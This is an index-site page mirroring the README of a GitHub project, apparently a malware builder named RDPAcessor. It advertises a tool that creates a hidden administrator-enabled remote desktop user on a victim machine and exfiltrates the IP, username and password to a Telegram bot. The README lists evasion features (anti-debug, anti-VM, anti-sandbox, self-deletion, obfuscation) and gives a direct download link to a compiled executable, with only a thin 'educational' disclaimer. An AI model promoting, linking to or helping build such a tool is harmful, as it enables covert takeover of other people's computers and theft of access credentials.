An open API service indexing awesome lists of open source software.

https://github.com/k3rnel-dev/rdpacessor

Access to RDP in one click
https://github.com/k3rnel-dev/rdpacessor

hack hacking-tool malware malware-analysis malware-builder malware-research malware-tools rdp-access rdp-acessor rdp-stealer stealer

Last synced: 4 months ago
JSON representation

Access to RDP in one click

Awesome Lists containing this project

README

          

# 🛠️ RDPACESSOR V6 - REBORN ( *NEW* )

>![CSHARP](https://img.shields.io/badge/Language-CSHARP-lightgreen?style=for-the-badge&logo=csharp)

>![Banner](banner.png)

### > **[⬇️ Download for Windows](https://github.com/K3rnel-Dev/RDPAcessor/releases/download/Build/RDPAcessorV6.exe)**

```diff
- to compile this project(s) visual studio 2019 or above to is required and dnlib package
```

# ⚙️ About

> **A simple example** of a reworked previous project, allowing you to create a user on the end system, enable its groups of remote users and thereby send data to a telegram bot, with data inside: IP address, username and password from the created user, as well as the current RAM memory.
The project has a builder that allows you to automate the assembly of a malicious file, with various conditional interesting functions that will be included in the final compilation optionally at the request of the user himself

- 🖥️ **Anti-Analysis**: Anti-Debug/VM/Process.
- 🔥 **Self-Removal (Melting)**: Removes itself from the disk after execution.
- ⚔️ **Anti-AnyRun(Working only WIN-7)**: Prevents execute on anyrun systems.
- 📷 **Mutex**: Creates a stub in the registry to prevent repeated execution on the same system.
- 🔓 **RunAsAdmin**: A special function that initiates launch on behalf of the administrator - since creating a user and adding it requires administrator rights.
- ⚙️ **Conditional Compilation**: Allows the builder to include only the features and options chosen by the user, making the final build more streamlined.
- 🔒 **Custom Renaming and Obfuscation**: Includes customizable renaming of functions and string encryption to make the code less readable and harder to analyze.

## 📸 **Screens**:
> ![p2.png](p2.png)
> ![p1](p1.png)

## ⚠️ **Disclaimer**:
```
This project is for educational purposes only, intended for studying malware and security techniques. The author is not responsible for any malicious use of this software.
```


# ⭐ Credits

- **Author**: @K3rnel-Dev
- **dnlib**: A library for manipulating .NET assemblies.
GitHub: [https://github.com/0xd4d/dnlib](https://github.com/0xd4d/dnlib)
---